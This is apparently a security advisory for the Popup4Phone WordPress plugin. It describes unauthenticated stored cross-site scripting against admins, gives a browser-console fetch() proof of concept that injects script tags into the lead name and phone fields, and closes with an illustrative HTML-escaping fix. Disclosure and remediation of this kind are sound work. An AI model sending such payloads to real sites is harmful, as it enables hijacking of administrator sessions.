Description

The plugin does not sanitise and escape some parameters, which could allow unauthenticated users to perform Cross-Site Scripting attacks against admins.
Run the following JavaScript in the browser console:
```
// Submits a lead through the plugin's form handler; the name and phone
// fields carry the test markup that is later rendered in the admin Leads page.
fetch("/", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "popup4phone%5Bws_pages_submit_url%5D=&popup4phone%5Bws_pages_submit_title%5D=Popup4Phone+%E2%80%93+WPScan+Vulnerability+Testbench&popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E&popup4phone%5Bemail%5D=test%40example.com&popup4phone%5Bmessage%5D=test&ajax=1",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));
```
After running the JavaScript, log in as an admin and browse to "Popup4Phone > Leads" to see the XSS.
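The output escaping that the description says is missing, shown as an added example (not the plugin's code or its actual fix): it decodes the lead fields from the request body above and renders them the way a leads table should, with HTML-significant characters encoded. The function names `parseLeadFields`, `reviewLead` and `renderLeadRow` are hypothetical; in WordPress itself the equivalent calls are `sanitize_text_field()` on input and `esc_html()` / `esc_attr()` on output.

```javascript
// Subset of the request body shown above (same field names and test values).
const SAMPLE_BODY =
  "popup4phone%5Bname%5D=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" +
  "&popup4phone%5Bphone%5D=%22%3E%3Cscript%3Ealert(2)%3C%2Fscript%3E" +
  "&popup4phone%5Bemail%5D=test%40example.com" +
  "&popup4phone%5Bmessage%5D=test&ajax=1";

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode the five characters that can change HTML context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Extract popup4phone[<field>] pairs from a form-urlencoded body.
function parseLeadFields(body) {
  const fields = {};
  for (const [key, value] of new URLSearchParams(body)) {
    const match = /^popup4phone\[([^\]]+)\]$/.exec(key);
    if (match) fields[match[1]] = value;
  }
  return fields;
}

// For each lead field, report the raw value, its escaped form, and whether
// escaping changed it (i.e. the raw value is unsafe to echo into HTML).
function reviewLead(body) {
  return Object.entries(parseLeadFields(body)).map(([field, raw]) => {
    const escaped = escapeHtml(raw);
    return { field, raw, escaped, needsEscaping: escaped !== raw };
  });
}

// Render one table row for the admin view using only escaped values.
function renderLeadRow(body) {
  const cells = reviewLead(body).map((r) => `<td>${r.escaped}</td>`);
  return `<tr>${cells.join("")}</tr>`;
}

for (const r of reviewLead(SAMPLE_BODY)) {
  console.log(r.field, r.needsEscaping ? "ESCAPED ->" : "unchanged ->", r.escaped);
}
console.log(renderLeadRow(SAMPLE_BODY));
```

Escaping at render time is the control that matters here, because the value is stored by one request and displayed to a different, privileged user later.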